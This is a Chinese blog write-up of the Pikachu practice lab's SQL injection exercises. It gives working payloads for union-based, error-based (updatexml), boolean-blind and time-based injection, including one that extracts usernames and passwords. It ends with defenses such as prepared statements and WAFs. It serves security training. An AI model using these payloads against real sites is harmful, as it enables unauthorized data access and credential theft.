Loading

pikachu SQL Injection

SQL Injection攻击流程

1.找到注入点,可以用web漏洞扫描工具自动找或者自己输入payload进行查找

2.通过注入点输入payload爆出信息,比如版本操作系统,表列字段的值

3.获取操作系统权限,通过数据库执行shell上传木马。

 

数字型注入post

因为是post,所以不会在URL中传参,我们可以抓包看一下

 

 

 发送到repeater模块进行修改测试

尝试 1 or 1 = 1  状态是200,说明是正确的

 

这里将所有的信息都爆了出来

 

 

 

 

确定有几列

payload:1 order by 3  正常回显,说明就这两列

 

 

 确定回显字段:

payload: 0 union select 1,2  都可回显

 

 

 剩下的操作和sqlilabs中的基本就一致了,爆库爆表爆字段爆字段值(虽然直接1 or 1=1

就已经把所有信息爆出来了,不过还是想操作一下~)

 

字符型注入get

随便输一个1,因为是get请求所以传参就在url里了

 

 

 观察源码发现闭合为单引号闭合

 

 

 payload:kobe' or 1 = 1 # 即可得到所有信息

 

 

搜索型注入

在数据库中 搜索语句一般为:

select * from number where username like '%str%'

字符串会被  '%%'包裹

 

 观察源码,同样name参数从前端传过来也没有进行处理,用'%%'包裹

 

所以只需要考虑闭合即可,下面给几个例子

1. like '%str%' or 1 = 1 #%'     

2. like '%%%%'

 

xx型注入

唯一不同的就是闭合变成了('')

所以注意闭合多加的括号即可

('xx') or 1 = 1 #')

 

 

 

 insert/update注入

后面几个小模块基本是基于报错的注入,一般是前端没有屏蔽报错信息

一般常用的3个函数:

1.updatexml():在MySQL中对XML文档数据进行查询和修改的XPATH函数。

2.extractvalue():在MySQL中对XML文档数据进行查询的XPATH函数。

3.floor():MySQL中用来取整的函数。

如果XPathstring这里是一个表达式会先把表达式执行之后将结果通过报错回显出来

 

inert注入:前端输入的数据会通过后台insert数据进去

insert语句一般为:

insert into 表名(username,pw,sex) values('str',111,2,333,4)

我们主要是在str这里构造闭合,红色部分为payload。

insert into 表名(username,pw,sex) values('  1' or updatexml(1,concat(0x7e,database()),0)   or '  ',111,2,333,4)

可以获取数据库

 

 

 

接下来update部分和insert部分是差不多的,我们先注册好一个账号进去登录

 

 

还是在有字符型注入漏洞的地方,输入我们上面的payload

 

 

 

delete注入

 

 先删除一个留言抓包看一哈,应该是用id进行为关键字进行删除

 

 将这个包发送到repeater 改包放包。

payload:id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)

因为这个包是已经前端url处理过的,所以我们的payload也要进行url编码

这样后台才可以解析执行我们的payload

 

 获得账号密码

 

 

 

Http Header注入

指的是一种场景,开发人员为了验证客户端头部信息,或者通过头部获取客户端信息,

比如useragent、accept字段。会对客户端头部信息进行获取并使用SQL进行处理,

如果没有做安全处理会导致SQL注入的漏洞。

 

先登录这个模块,这里后台应该是已经获取了我们的头部信息

 

 我们抓包发送到repeater模块看一下

 

 在ua这里将内容清除 只输入单引号,发现报错,说明是获取了我们的头部的值了

 

 所以数据库那里会有一个insert操作,我们输入上面insert构造的payload进行尝试:

firefpx' or updatexml(1,concat(0x7e,database()),0)   or '

 

 同理在cookie那里输入同样的payload也是可以执行的

 

布尔盲注

在sqli-labs已经用过很多了,所以下面就给个例子,如果不会的可以看sqli-labs中

我写的关于盲注的部分,还算是比较详细。

payload:

kobe' and ascii(substr(database(),1,1))>113 #

可以看到报错了,因为p是112 所以<113 肯定会报错的,而报错注入就是根据输入

的payload的逻辑正确还是错误进行猜测,但是前提需要前端页面可以返回报错信息。

 

 

 

payload:

kobe' and ascii(substr(database(),1,1))=112 #

 

 

 

 

延时注入

布尔盲注是基于页面回显的正确还是错误

延时注入是根据页面是否执行sleep() 还是迅速回显来判断正误

这个我在sqli-labs中也是有写到,可以翻看我延时注入的blog

payload:(如果sleep5秒就是正确,否则直接返回页面)

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

 

SQL Injection注入漏洞防范

一般通过两个维度来防范

1.代码层面:

  ①对输入进行严格的过滤和转义

  ②使用预处理和参数化(Parameterized)

2.网络层面:

  ①通过WAF设备启用防SQL Injection注入策略

  ②云端防护(360,阿里云盾)

 

转义+过滤:mysqli_real_escape_string()转义过滤单双引号等

       str_replace("%","",$_POST['username']),把post里面的数据含有的%替换为空

预处理:使用PDO的prepare预处理(预处理+参数化)

    平常SQL注入的时候是直接将payload和参数进行拼接,而prepare

    先不传参数,先做预处理,比如下面的?就是一个参数化的占位符

    当传参的时候都会把我们输入的语句当作一个整体去处理,而不像

    我们之前那样可以进行闭合拼接。PDO默认情况会有两次交互,先

    将带有占位符的参数华语句传给后台,之后再传语句。这样基本杜绝

    了SQL注入的漏洞

 

 

网络防护:WAF

  甲方通过部署WAF,如果攻击者注入payload也会先通过WAF,WAF会识别出

  不安全的请求然后阻拦掉这次请求。不仅是本地WAF,还有一些云WAF,还可    

  以进行DDOS(流量)清晰,SDN加速等。

    

 

posted @ 2020-03-31 20:31  Zh1z3ven  阅读(183)  评论(0编辑  收藏  举报